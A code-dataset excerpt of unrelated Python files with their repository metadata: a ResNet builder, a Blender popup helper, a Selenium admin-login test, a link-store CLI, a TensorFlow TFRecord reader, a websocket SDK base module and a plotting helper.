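# Builds a WRN for 32x32 RGB inputs such as CIFAR-10. The hyperparameters are
# illustrative only, not taken from the repository.
if __name__ == '__main__':
    cifar_inputs = layers.Input(shape=(32, 32, 3))
    model = build_wrn(cifar_inputs, n_classes=10, groups=3,
                      blocks_in_groups=4, filters_mult=8, dropout=0.3)
    model.summary()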
|
[
"noreply@github.com"
] |
GRSEB9S.noreply@github.com
|
7c036450975191a96468b11af985b239af0ca668
|
545287103b8af5d70a008dcc6944b23ba2085e4a
|
/maze_generator/blender/interaction/messagebox_manager.py
|
bb42b72fd90b49caeac63d2924ac9f86d942d800
|
[] |
no_license
|
Gorgious56/MazeGenerator
|
ac83040ebb78029065fbfc46a23f6ee9f950ce89
|
c7786a1d0bade95469ba87c9537d1da64801dc66
|
refs/heads/master
| 2022-11-23T21:21:08.254284
| 2022-11-06T10:58:28
| 2022-11-06T10:58:28
| 250,792,747
| 67
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
import bpy
def ShowMessageBox(message="", title="Message Box", icon='INFO'):
def draw(self, context):
        self.layout.label(text=message)  # Blender 2.8+ makes 'text' keyword-only
bpy.context.window_manager.popup_menu(draw, title=title, icon=icon)
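# Added usage example (call from inside Blender, e.g. an operator's execute()):
# ShowMessageBox("Maze generated", title="Maze Generator", icon='INFO')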
|
[
"nathan.hild@gmail.com"
] |
nathan.hild@gmail.com
|
40bcf300e0d4931eb0336d1a4a8224e3aec77be7
|
8adca41b59f269c62b2b469789e164ad240a5dd7
|
/ui/demo3 (2).py
|
6773f4167c84166af642430e26eaa4fe568a24b8
|
[] |
no_license
|
zhongxiu-xiu/python_study
|
16794a0ebdcc815bafb1c49928b2dbbb1306b52c
|
19fcdebc197f5d06e493a4dfc682e51a47b30191
|
refs/heads/master
| 2023-02-06T05:50:28.693653
| 2020-12-26T02:00:41
| 2020-12-26T02:00:41
| 322,170,575
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
# -*-coding:UTF-8 -*-
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
driver = webdriver.Chrome()
driver.get('http://192.168.1.4/ecshop/admin/privilege.php?act=login')
driver.maximize_window()
driver.find_element_by_name('username').send_keys('caichang')
driver.find_element_by_name('password').send_keys('caichang1')
driver.find_element_by_class_name('btn-a').send_keys(Keys.ENTER)
driver.switch_to.frame('header-frame')
ActionChains(driver).move_to_element(driver.find_element_by_link_text('个人设置')).perform()
driver.find_element_by_link_text('退出').click()
|
[
"1053966454@qq.com"
] |
1053966454@qq.com
|
5b8d58249172a7b5266d50944fceb096f4ba4a1b
|
878625467c09742cbcc660791e5b2b38a407b4fe
|
/regular expression/mob.py
|
fded198953b8888ba27214e9779759599f3e4242
|
[] |
no_license
|
PraisyPrasad/luminarpythonprograms
|
b7c80a08fe380826513d5339c8899927405e40dd
|
83dfcb143d7fc9de53d4882f695a467fe238772e
|
refs/heads/master
| 2023-04-25T09:02:33.028285
| 2021-05-15T00:23:45
| 2021-05-15T00:23:45
| 367,158,687
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 152
|
py
|
import re
n=input("enter num is valid")
x='[+][9][1]\d{10}'
match=re.fullmatch(x,n)
if match is not None:
print("valid")
else:
print("invalid")
|
[
"praisyprasad123@gmail.com"
] |
praisyprasad123@gmail.com
|
10d3ddc612d1426bc04e35bc349569fe384e0a69
|
174ad2b84041ee9dface6f822737cd30e39aa04d
|
/PythonHomeWork(Essential)/PythonHomeWork_7/HomeWork7/AddTask/Task2(newVersion)/cli_main.py
|
a814ef3fda06880248a9c9e6bd995c6160cd7d74
|
[] |
no_license
|
duk1edev/projects
|
88f26830ac16f0fc889cace8ffab756788ee0b24
|
74bdea8b56bee9e1c0d8a78405ad0ca7bad38543
|
refs/heads/master
| 2020-06-24T17:15:17.891008
| 2019-11-29T17:23:54
| 2019-11-29T17:23:54
| 199,027,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,312
|
py
|
"""Модуль консольного интерфейса приложения"""
from links_db import LinksDB
def add_link_to(links):
"""Функция добавления новой ссылки в хранилище links"""
while True:
short_name = input('Enter the short name: ')
original_url = input('Enter url:')
try:
links.set_url(short_name, original_url)
except (KeyError, ValueError)as error:
print(error.args[0])
else:
break
def get_link_from(links):
"""Фугкция получения ссылки из хранилища links_db"""
name = input('Enter the link name: ')
try:
url = links.get_url(name)
except KeyError:
print('Key does not exist')
else:
print(url)
links = LinksDB()
def main():
"""Главная функция приложения"""
while True:
print('1.Add link')
print('2.Get link')
print('3.Exit')
        choice = input(">")
        if choice == '1':
            add_link_to(links)
        elif choice == '2':
            get_link_from(links)
        elif choice == '3':
break
else:
print('Incorrect input')
print()
if __name__ == '__main__':
main()
|
[
"duk1e.ptc.ua@yandex.ru"
] |
duk1e.ptc.ua@yandex.ru
|
3e4b00a89caba59ee5ff048d9bdc3d13ea5a3684
|
5fedc522580b56a3670762dcba6408cfe4d52a8b
|
/application/api/evaluaciones/config.py
|
cb2576d2f0aa6b373e6f1437b14776f8e0f29600
|
[] |
no_license
|
AlexisAndresHR/EncuentrAhorro_WebApp
|
953ea30ee23fd92ffe37ebb1d35c141f61818781
|
63a4d8a272d257e0d93c62557b88731e04b01937
|
refs/heads/master
| 2020-05-03T11:06:25.507755
| 2019-12-11T09:51:24
| 2019-12-11T09:51:24
| 178,593,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
import web
import application.models.model_evaluaciones
model = application.models.model_evaluaciones
|
[
"1717110253@utectulancingo.edu.mx"
] |
1717110253@utectulancingo.edu.mx
|
e1b6e83e07a9bcfd9001a34c8070d429dfa2709b
|
23255bee10b758d10e403b5a05fa6b16f95d9760
|
/python_visual_mpc/video_prediction/read_tf_record.py
|
4b95d75ad1c24d8ef3e9451a4146fb86abe253ba
|
[] |
no_license
|
yilundu/visual_mpc
|
454e5c1cc80a7f3c6a272a65bca8057176c280ab
|
357ba4df88dc5ab07ddb67a6cab260fc24a43a01
|
refs/heads/master
| 2022-01-12T02:00:23.606406
| 2017-09-22T22:23:41
| 2017-09-22T22:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,533
|
py
|
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import gfile
import matplotlib.pyplot as plt
import pdb
from PIL import Image
import imp
# Dimension of the state and action.
STATE_DIM = 4
ACION_DIM = 2
OBJECT_POS_DIM = 3
from python_visual_mpc.video_prediction.utils_vpred.create_gif_lib import *
def build_tfrecord_input(conf, training=True, gtruth_pred = False, shuffle_vis = False):
"""Create input tfrecord tensors.
Args:
      training: whether to load the training split (True) or the validation split (False).
      conf: a dictionary containing the configuration for the experiment.
Returns:
list of tensors corresponding to images, actions, and states. The images
tensor is 5D, batch x time x height x width x channels. The state and
action tensors are 3D, batch x time x dimension.
Raises:
RuntimeError: if no files found.
"""
filenames = gfile.Glob(os.path.join(conf['data_dir'], '*'))
if not filenames:
raise RuntimeError('No data_files files found.')
if conf['visualize']:
print 'using input file', filenames
shuffle = shuffle_vis
else:
shuffle = True
index = int(np.ceil(conf['train_val_split'] * len(filenames)))
if training:
filenames = filenames[:index]
else:
filenames = filenames[index:]
filename_queue = tf.train.string_input_producer(filenames, shuffle=shuffle)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
gtruthimage_seq, predimage_seq, image_seq, retina_seq, state_seq, action_seq, object_pos_seq, max_move_pos_seq, touch_seq = [], [], [], [], [], [], [], [], []
load_indx = range(0, 30, conf['skip_frame'])
load_indx = load_indx[:conf['sequence_length']]
print 'using frame sequence: ', load_indx
for i in load_indx:
if gtruth_pred:
image_pred_name = 'move/' + str(i) + '/image_pred/encoded'
image_gtruth_name = 'move/' + str(i) + '/image_gtruth/encoded'
features = {
image_pred_name: tf.FixedLenFeature([1], tf.string),
image_gtruth_name: tf.FixedLenFeature([1], tf.string),
}
else:
image_name = 'move/' + str(i) + '/image/encoded'
action_name = 'move/' + str(i) + '/action'
state_name = 'move/' + str(i) + '/state'
object_pos_name = 'move/' + str(i) + '/object_pos'
max_move_pos_name = 'move/' + str(i) + '/max_move_pose'
features = {
image_name: tf.FixedLenFeature([1], tf.string),
action_name: tf.FixedLenFeature([ACION_DIM], tf.float32),
state_name: tf.FixedLenFeature([STATE_DIM], tf.float32)
}
if 'use_object_pos' in conf.keys():
if 'num_obj' in conf:
num_obj = conf['num_obj']
else: num_obj = 1
features[object_pos_name] = tf.FixedLenFeature([OBJECT_POS_DIM*num_obj], tf.float32)
features[max_move_pos_name] = tf.FixedLenFeature([OBJECT_POS_DIM], tf.float32)
if 'retina' in conf:
retina_name = 'move/' + str(i) + '/retina/encoded'
features[retina_name] = tf.FixedLenFeature([1], tf.string)
if i == 0:
initial_retpos_name = 'initial_retpos'
features[initial_retpos_name] = tf.FixedLenFeature([2], tf.int64)
if 'touch' in conf:
touchdata_name = 'touchdata/' + str(i)
TOUCH_DIM = 20
features[touchdata_name] = tf.FixedLenFeature([TOUCH_DIM], tf.float32)
features = tf.parse_single_example(serialized_example, features=features)
if gtruth_pred:
predimage_seq.append(resize_im( features, image_pred_name, conf))
gtruthimage_seq.append(resize_im( features, image_gtruth_name, conf))
else:
image_seq.append(resize_im( features, image_name, conf))
if 'retina' in conf:
retina_seq.append(resize_im(features, retina_name, conf, height=conf['retina']))
if i == 0:
initial_retpos = tf.cast(features[initial_retpos_name], tf.int32)
state = tf.reshape(features[state_name], shape=[1, STATE_DIM])
state_seq.append(state)
action = tf.reshape(features[action_name], shape=[1, ACION_DIM])
action_seq.append(action)
if 'touch' in conf:
touchdata = tf.reshape(features[touchdata_name], shape=[1, TOUCH_DIM])
touch_seq.append(touchdata)
if 'use_object_pos' in conf:
object_pos = tf.reshape(features[object_pos_name], shape=[1, OBJECT_POS_DIM*num_obj])
object_pos_seq.append(object_pos)
max_move_pos = tf.reshape(features[max_move_pos_name], shape=[1, OBJECT_POS_DIM])
max_move_pos_seq.append(max_move_pos)
if gtruth_pred:
gtruthimage_seq = tf.concat(axis=0, values=gtruthimage_seq)
predimage_seq = tf.concat(axis=0, values=predimage_seq)
if conf['visualize']:
num_threads = 1
else:
num_threads = np.min((conf['batch_size'], 32))
[pred_image_batch, gtruth_image_batch] = tf.train.batch(
[predimage_seq, gtruthimage_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return gtruth_image_batch, pred_image_batch
else:
image_seq = tf.concat(axis=0, values=image_seq)
if 'retina' in conf:
retina_seq = tf.concat(axis=0, values=retina_seq)
if conf['visualize']: num_threads = 1
else: num_threads = np.min((conf['batch_size'], 32))
state_seq = tf.concat(axis=0, values=state_seq)
action_seq = tf.concat(axis=0, values=action_seq)
if 'touch' in conf:
touch_seq = tf.concat(axis=0, values=touch_seq)
if 'use_object_pos' in conf.keys() and not 'retina' in conf:
[image_batch, action_batch, state_batch, object_pos_batch, max_move_pos_batch] = tf.train.batch(
[image_seq, action_seq, state_seq, object_pos_seq, max_move_pos_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return image_batch, action_batch, state_batch, object_pos_batch, max_move_pos_batch
elif 'retina' in conf:
[image_batch, retina_batch, action_batch, state_batch, object_pos_batch] = tf.train.batch(
[image_seq, retina_seq, action_seq, state_seq, object_pos_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return image_batch, retina_batch, action_batch, state_batch, object_pos_batch
elif 'touch' in conf:
[image_batch, action_batch, state_batch, touch_batch] = tf.train.batch(
[image_seq, action_seq, state_seq, touch_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return image_batch, action_batch, state_batch, touch_batch
else:
[image_batch, action_batch, state_batch] = tf.train.batch(
[image_seq, action_seq, state_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return image_batch, action_batch, state_batch
def resize_im(features, image_name, conf, height = None):
COLOR_CHAN = 3
if '128x128' in conf:
ORIGINAL_WIDTH = 128
ORIGINAL_HEIGHT = 128
IMG_WIDTH = 128
IMG_HEIGHT = 128
elif height != None:
ORIGINAL_WIDTH = height
ORIGINAL_HEIGHT = height
IMG_WIDTH = height
IMG_HEIGHT = height
else:
ORIGINAL_WIDTH = 64
ORIGINAL_HEIGHT = 64
IMG_WIDTH = 64
IMG_HEIGHT = 64
image = tf.decode_raw(features[image_name], tf.uint8)
image = tf.reshape(image, shape=[1, ORIGINAL_HEIGHT * ORIGINAL_WIDTH * COLOR_CHAN])
image = tf.reshape(image, shape=[ORIGINAL_HEIGHT, ORIGINAL_WIDTH, COLOR_CHAN])
if IMG_HEIGHT != IMG_WIDTH:
raise ValueError('Unequal height and width unsupported')
crop_size = min(ORIGINAL_HEIGHT, ORIGINAL_WIDTH)
image = tf.image.resize_image_with_crop_or_pad(image, crop_size, crop_size)
image = tf.reshape(image, [1, crop_size, crop_size, COLOR_CHAN])
image = tf.image.resize_bicubic(image, [IMG_HEIGHT, IMG_WIDTH])
image = tf.cast(image, tf.float32) / 255.0
return image
##### code below is used for debugging
def add_visuals_to_batch(conf, image_data, pos_data, color ='b'):
seq_len = image_data.shape[1]
bsize = image_data.shape[0]
img = np.uint8(255. * image_data)
image__with_visuals = np.zeros_like(image_data, dtype=np.uint8)
for b in range(bsize):
for t in range(seq_len):
state = pos_data[b, t]
sel_img = img[b,t]
image__with_visuals[b, t] = get_frame_with_posdata(sel_img, state, color)
# image__with_visuals[b, t] = get_frame_with_visual(sel_img, actions, state, action_pos= action_pos)
return image__with_visuals.astype(np.float32) / 255.0
def get_frame_with_posdata(img, pos, color = 'b'):
"""
visualizes the actions in the frame
:param img:
:param action:
:param state:
:param action_pos:
:return:
"""
numobjects = 1
pos = pos.reshape(numobjects,3)
fig = plt.figure(figsize=(1, 1), dpi=64)
fig.add_subplot(111)
plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)
axes = plt.gca()
plt.cla()
axes.axis('off')
plt.imshow(img, zorder=0)
axes.autoscale(False)
for i in range(numobjects):
arrow_end = pos[i,:2] + np.array([np.cos(pos[i,2]),np.sin(pos[i,2])])*.15
arrow_end = mujoco_to_imagespace(arrow_end)
pos_img = mujoco_to_imagespace(pos[i,:2])
plt.plot(pos_img[1], pos_img[0], zorder=1, marker='o', color=color)
yaction = np.array([pos_img[0], arrow_end[0]])
xaction = np.array([pos_img[1], arrow_end[1]])
plt.plot(xaction, yaction, zorder=1, color=color, linewidth=3)
fig.canvas.draw() # draw the canvas, cache the renderer
data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# plt.show()
# Image.fromarray(data).show()
# pdb.set_trace()
return data
def get_frame_with_visual(img, action, state, action_pos= False):
"""
visualizes the actions in the frame
:param img:
:param action:
:param state:
:param action_pos:
:return:
"""
fig = plt.figure(figsize=(1, 1), dpi=64)
fig.add_subplot(111)
plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)
axes = plt.gca()
plt.cla()
axes.axis('off')
plt.imshow(img, zorder=0)
axes.autoscale(False)
if action_pos:
p = mujoco_to_imagespace(action)
else:
p = mujoco_to_imagespace(state + .05 * action)
state = mujoco_to_imagespace(state)
plt.plot(state[1], state[0], zorder=1, marker='o', color='r')
yaction = np.array([state[0], p[0]])
xaction = np.array([state[1], p[1]])
plt.plot(xaction, yaction, zorder=1, color='y', linewidth=3)
fig.canvas.draw() # draw the canvas, cache the renderer
data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# plt.show()
# Image.fromarray(data).show()
# pdb.set_trace()
return data
def mujoco_to_imagespace(mujoco_coord, numpix=64):
viewer_distance = .75 # distance from camera to the viewing plane
window_height = 2 * np.tan(75 / 2 / 180. * np.pi) * viewer_distance # window height in Mujoco coords
pixelheight = window_height / numpix # height of one pixel
pixelwidth = pixelheight
window_width = pixelwidth * numpix
middle_pixel = numpix / 2
pixel_coord = np.array([-mujoco_coord[1], mujoco_coord[0]])/pixelwidth + \
np.array([middle_pixel, middle_pixel])
return pixel_coord
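# e.g. mujoco_to_imagespace(np.array([0., 0.])) maps the Mujoco origin to the
# image center, (32., 32.), for the default 64-pixel frame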
if __name__ == '__main__':
# for debugging only:
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
print 'using CUDA_VISIBLE_DEVICES=', os.environ["CUDA_VISIBLE_DEVICES"]
conf = {}
# DATA_DIR = '/home/frederik/Documents/lsdc/experiments/cem_exp/benchmarks_goalimage/pixelerror_store_wholepred/tfrecords/train'
DATA_DIR = '/home/frederik/Documents/lsdc/pushing_data/random_action_var10_pose/test'
# DATA_DIR = '/media/frederik/harddrive/pushingdata/large_displacement_pose180k/train/'
# DATA_DIR = '/home/frederik/Documents/lsdc/pushing_data/retina/train'
conf['schedsamp_k'] = -1 # don't feed ground truth
conf['data_dir'] = DATA_DIR # 'directory containing data_files.' ,
conf['skip_frame'] = 1
conf['train_val_split']= 0.95
conf['sequence_length']= 15 # 'sequence length, including context frames.'
conf['use_state'] = True
conf['batch_size']= 20
conf['visualize']=False
# conf['retina'] = 80
conf['use_object_pos'] =''
conf['num_obj'] = 4
print '-------------------------------------------------------------------'
print 'verify current settings!! '
for key in conf.keys():
print key, ': ', conf[key]
print '-------------------------------------------------------------------'
# both ground truth and predicted images in data:
gtruth_pred = False
touch = False
print 'testing the reader'
if touch:
conf['touch'] = ''
image_batch, action_batch, state_batch, touch_batch = build_tfrecord_input(conf, training=True)
elif 'use_object_pos' in conf:
image_batch, action_batch, state_batch, pos_batch, max_move_pos_batch = build_tfrecord_input(conf, training=True)
elif 'retina' in conf:
        image_batch, retina_batch, action_batch, state_batch, pos_batch = build_tfrecord_input(conf, training=True)
else:
image_batch, action_batch, state_batch = build_tfrecord_input(conf, training=True,gtruth_pred= gtruth_pred)
sess = tf.InteractiveSession()
tf.train.start_queue_runners(sess)
sess.run(tf.global_variables_initializer())
for i in range(1):
print 'run number ', i
if gtruth_pred:
gtruth_data, pred_data = sess.run([gtruth_image_batch, pred_image_batch])
elif touch:
image_data, action_data, state_data, touch_data = sess.run([image_batch,
action_batch,
state_batch,
touch_batch])
elif 'use_object_pos' in conf:
image_data, action_data, state_data, pos_data, max_move_data = sess.run([image_batch, action_batch, state_batch, pos_batch, max_move_pos_batch])
elif 'retina' in conf:
            image_data, retina_data, action_data, state_data, pos_data = sess.run([image_batch, retina_batch, action_batch, state_batch, pos_batch])
else:
image_data, action_data, state_data = sess.run([image_batch, action_batch, state_batch])
print 'action:', action_data.shape
print 'action: batch ind 0', action_data[0]
print 'action: batch ind 1', action_data[1]
# pos_data = np.squeeze(pos_data)
# print 'pos:', pos_data.shape
# print 'pos: batch ind 0', pos_data[0]
# print 'pos: batch ind 1', pos_data[1]
# pos_data = np.squeeze(pos_data)
giffile = '/'.join(str.split(conf['data_dir'], '/')[:-1] + ['preview'])
comp_single_video(giffile, image_data, num_exp=8)
if 'use_object_pos' in conf:
visual_batch = add_visuals_to_batch(conf, image_data, max_move_data)
giffile = '/'.join(str.split(conf['data_dir'], '/')[:-1] + ['video_with_pos'])
comp_single_video(giffile, visual_batch, num_exp=10)
pdb.set_trace()
# make video preview video
gif_preview = '/'.join(str.split(__file__, '/')[:-2] + ['preview'])
if 'retina' in conf:
retina_data = np.split(retina_data, retina_data.shape[1], axis=1)
retina_data = np.squeeze(retina_data)
giffile = '/'.join(str.split(conf['data_dir'], '/')[:-1] + ['preview'])
assembled = assemble_gif([retina_data], num_exp=10)
npy_to_gif(assembled, giffile+'_retina')
else:
comp_single_video(gif_preview, image_data, num_exp=conf['batch_size'])
# make video preview video with annotated forces
# gif_preview = '/'.join(str.split(__file__, '/')[:-1] + ['preview_visuals'])
# comp_single_video(gif_preview, add_visuals_to_batch(image_data, action_data, state_data, action_pos=True))
# show some frames
# for i in range(10):
# # print 'object pos', object_pos.shape
# img = np.uint8(255. *image_data[0, i])
# img = Image.fromarray(img, 'RGB')
# img.show()
# get_frame_with_posdata(img, object_pos[0, i])
|
[
"frederik.ebert@mytum.de"
] |
frederik.ebert@mytum.de
|
af525ba2ecb614636ec05e27a2a9a2e87baddc34
|
b7341581abaf2fb50e10e14911cc579e606a23d2
|
/sirius_sdk/base.py
|
a1b521ab14b01c31c004db93b6b13035aede40d2
|
[
"Apache-2.0"
] |
permissive
|
GarlonHasham/sirius-sdk-python
|
3e627af6c2b3ef641b27514787fb08d0e0b30808
|
715b12c910574d78502f186aa512bc1ef5b63fbc
|
refs/heads/master
| 2023-05-14T03:56:29.141362
| 2021-06-03T10:42:01
| 2021-06-03T10:42:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,958
|
py
|
import asyncio
from abc import ABC, abstractmethod
from typing import Any, Union, List
from urllib.parse import urljoin
from inspect import iscoroutinefunction
import aiohttp
from sirius_sdk.messaging import Message
from sirius_sdk.errors.exceptions import *
class JsonSerializable:
@abstractmethod
def serialize(self) -> dict:
        raise NotImplementedError()
@classmethod
@abstractmethod
def deserialize(cls, buffer: Union[dict, bytes, str]):
        raise NotImplementedError()
class ReadOnlyChannel(ABC):
"""Communication abstraction for reading data stream
"""
@abstractmethod
async def read(self, timeout: int=None) -> bytes:
"""Read message packet
        :param timeout: Operation timeout in seconds
:return: chunk of data stream
"""
        raise NotImplementedError()
class WriteOnlyChannel(ABC):
"""Communication abstraction for writing data stream
"""
@abstractmethod
async def write(self, data: bytes) -> bool:
"""
Write message packet
:param data: message packet
        :return: True if success else False
"""
        raise NotImplementedError()
class BaseConnector(ReadOnlyChannel, WriteOnlyChannel):
"""Transport Layer.
Connectors operate as transport provider for high-level abstractions
"""
@abstractmethod
async def open(self):
"""Open communication
"""
        raise NotImplementedError()
@abstractmethod
async def close(self):
"""Close communication
"""
        raise NotImplementedError()
class WebSocketConnector(BaseConnector):
DEF_TIMEOUT = 30.0
ENC = 'utf-8'
def __init__(
self, server_address: str, path: str, credentials: bytes,
timeout: float=DEF_TIMEOUT, loop: asyncio.AbstractEventLoop=None
):
self.__session = aiohttp.ClientSession(
loop=loop,
timeout=aiohttp.ClientTimeout(total=timeout),
headers={
'origin': server_address,
'credentials': credentials.decode('ascii')
}
)
self._url = urljoin(server_address, path)
self._ws = None
def __del__(self):
asyncio.ensure_future(self.__session.close())
@property
def is_open(self):
return self._ws is not None and not self._ws.closed
async def open(self):
if not self.is_open:
self._ws = await self.__session.ws_connect(url=self._url)
async def close(self):
if self.is_open:
await self._ws.close()
self._ws = None
async def reopen(self):
await self.close()
await self.open()
async def read(self, timeout: int=None) -> bytes:
try:
msg = await self._ws.receive(timeout=timeout)
except asyncio.TimeoutError as e:
raise SiriusTimeoutIO() from e
if msg.type in [aiohttp.WSMsgType.CLOSE, aiohttp.WSMsgType.CLOSING, aiohttp.WSMsgType.CLOSED]:
raise SiriusConnectionClosed()
elif msg.type == aiohttp.WSMsgType.TEXT:
return msg.data.encode(self.ENC)
elif msg.type == aiohttp.WSMsgType.BINARY:
return msg.data
elif msg.type == aiohttp.WSMsgType.ERROR:
raise SiriusIOError()
async def write(self, message: Union[Message, bytes]) -> bool:
if isinstance(message, Message):
payload = message.serialize().encode(self.ENC)
else:
payload = message
await self._ws.send_bytes(payload)
return True
class AbstractStateMachine(ABC):
def __init__(self, time_to_live: int = 60, logger=None, *args, **kwargs):
"""
:param time_to_live: state machine time to live to finish progress
"""
self.__time_to_live = time_to_live
self.__is_aborted = False
if logger is not None:
if iscoroutinefunction(logger) or callable(logger):
pass
else:
raise RuntimeError('Expect logger is iscoroutine function or callable object')
self.__logger = logger
self.__coprotocols = []
@property
def time_to_live(self) -> int:
return self.__time_to_live
@property
def is_aborted(self) -> bool:
return self.__is_aborted
async def abort(self):
"""Abort state-machine"""
self.__is_aborted = True
for co in self.__coprotocols:
await co.abort()
self.__coprotocols.clear()
    async def log(self, **kwargs) -> bool:
        if self.__logger:
            kwargs = dict(**kwargs)
            kwargs['state_machine_id'] = id(self)
            await self.__logger(**kwargs)
            return True
        else:
            return False
def _register_for_aborting(self, co):
self.__coprotocols.append(co)
def _unregister_for_aborting(self, co):
self.__coprotocols = [item for item in self.__coprotocols if id(item) != id(co)]
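if __name__ == '__main__':
    # Minimal usage sketch (illustrative only; DemoMachine and demo_logger
    # are hypothetical examples, not part of the SDK):
    async def demo_logger(**kwargs):
        print('log:', kwargs)

    class DemoMachine(AbstractStateMachine):
        pass

    async def demo():
        machine = DemoMachine(time_to_live=30, logger=demo_logger)
        await machine.log(event='started')
        await machine.abort()
        print('is_aborted:', machine.is_aborted)

    asyncio.run(demo())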
|
[
"minikspb@gmail.com"
] |
minikspb@gmail.com
|
c01de8536620d8a07822fb1b991326e6bcd932c0
|
a46b1249f2e639041a9f10a475e2321c450cebcc
|
/Python/5.3.py
|
082b3874831b3625b1cfe19e3df5af9f0f192ae7
|
[] |
no_license
|
sarpong4/ICPP
|
5f3598dbbbf6edb49e5dbfe969bd208e4d1453e7
|
d3d9d4a5808a96ca0c5c3beda17ffcb59691f26c
|
refs/heads/master
| 2022-01-06T06:47:36.435602
| 2018-05-18T23:33:24
| 2018-05-18T23:33:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,441
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 24 10:02:55 2018
@author: Dr. Neptune
"""
# 5.3 | Lists and Mutability
#%%
L = ['I did it all', 4, 'Love']
for i in range(len(L)):
print(L[i])
print([1, 2, 3, 4][1:3][1])  # [1:3] gives [2, 3], so this prints 3
#%%
Techs = ['MIT', 'Caltech']
Ivys = ['Harvard', 'Yale', 'Brown']
Univs = [Techs, Ivys]
Univs1 = [['MIT', 'Caltech'], ['Harvard', 'Yale', 'Brown']]
print('Universities =', Univs)
print('Universities 1 =', Univs1)
print(Univs == Univs1)
#%%
# test value equality
print(Univs == Univs1)
# test object equality
print(id(Univs) == id(Univs1))
print('ID of Univs =', id(Univs))
print('ID of Univs1 =', id(Univs1))
#%%
Techs.append('RPI')
print(Techs)
'''
When there are 2 distinct paths to the same list object, we call that aliasing
'''
#%%
for e in Univs:
print('Univs contains', e)
print('\twhich contains')
for u in e:
print('\t', u)
#%%
L1 = [1, 2, 3]
L2 = [4, 5, 6]
L3 = L1 + L2
print('L3 =', L3)
L1.extend(L2)
print('L1 =', L1)
L1.append(L2)
print('L1 =', L1)
'''
L.append(e) adds the object e to the end of L
L.count(e) returns the number of times that e occurs in L
L.insert(i, e) inserts the object e into L at index i
L.extend(L1) adds the items in list L1 to the end of L
L.remove(e) deletes the first occurrence of e from L
L.index(e) returns the index of the first occurrence of e in L, and raises an exception if e is not in L
L.pop(i) removes and returns the item at index i in L, raises an exception if L is empty. If i is omitted, it defaults to -1, to remove and return the last element of L
L.sort() sorts the elements of L in ascending order
L.reverse() reverses the order of the elements in L
'''
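#%%
# A quick demonstration of several of the methods listed above:
L = [3, 1, 2]
L.insert(1, 5)       # L is now [3, 5, 1, 2]
print(L.index(5))    # 1
L.remove(5)          # L is now [3, 1, 2]
print(L.pop())       # 2, and L is now [3, 1]
L.sort()             # L is now [1, 3]
L.reverse()          # L is now [3, 1]
print(L)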
# Cloning
#%%
'''
It is prudent to avoid mutating a list over which one is iterating.
This can cause side effects
'''
def removeDups(L1, L2):
'''
Assumes that L1 and L2 are lists.
Removes any element from L1 that also occurs in L2
'''
for e1 in L1:
if e1 in L2:
L1.remove(e1)
L1 = [1, 2, 3, 4]
L2 = [1, 2, 5, 6]
removeDups(L1, L2)
print('L1 =', L1)
#%%
'''
This mutation can be avoided using slicing to clone (make a copy of the list)
'''
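#%%
# A minimal sketch of the slicing fix (removeDupsClone is an illustrative
# name): iterate over a clone of L1 while mutating L1 itself.
def removeDupsClone(L1, L2):
    for e1 in L1[:]:   # L1[:] clones L1, so removing from L1 is safe
        if e1 in L2:
            L1.remove(e1)

L1 = [1, 2, 3, 4]
L2 = [1, 2, 5, 6]
removeDupsClone(L1, L2)
print('L1 =', L1)  # L1 = [3, 4]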
# 5.3.2 | List Comprehension
L = [x**2 for x in range(1,7)]
print(L)
mixed = [1, 2, 'a', 3, 4.0]
print([x**2 for x in mixed if type(x) == int])
|
[
"gangalfish@live.com"
] |
gangalfish@live.com
|
00703d235bd4a267879c667ef3115ad8876c9d0c
|
8d7b51daf45cb883d600628db12ba73e01b48155
|
/mooc/ex2/plotData.py
|
c63c370d7373ecf1b09d064447d8b77265e5ba16
|
[] |
no_license
|
hendrikfrentrup/ML_tools
|
0c94bd41f4fedf55dc7aab9c341709aa58e01c6f
|
30f894e10e53cb7776979af11dbb3087a93c2339
|
refs/heads/master
| 2022-11-19T19:22:50.252753
| 2022-11-15T10:37:14
| 2022-11-15T10:37:14
| 56,457,876
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
def plotData(X,y):
#plotData Plots the data points X and y (into a new figure)
# plotData(X,y) plots the data points with + for the positive examples
# and o for the negative examples. X is assumed to be a Mx2 matrix.
import matplotlib.pyplot as pl
    # Find indices where y is True/1 or False/0
pos = y==1
neg = y==0
# Plot (into new figure?)
pl.plot( X[pos,0],X[pos,1],'g+',
X[neg,0],X[neg,1],'ro')
# block=False to prevent blocking while plot persists
pl.show(block=False)
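
if __name__ == '__main__':
    # Minimal usage sketch with synthetic data (illustrative; not the
    # exercise's data set):
    import numpy as np
    X = np.array([[1.0, 2.0], [2.0, 3.0], [3.0, 1.0], [0.5, 0.5]])
    y = np.array([1, 0, 1, 0])
    plotData(X, y)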
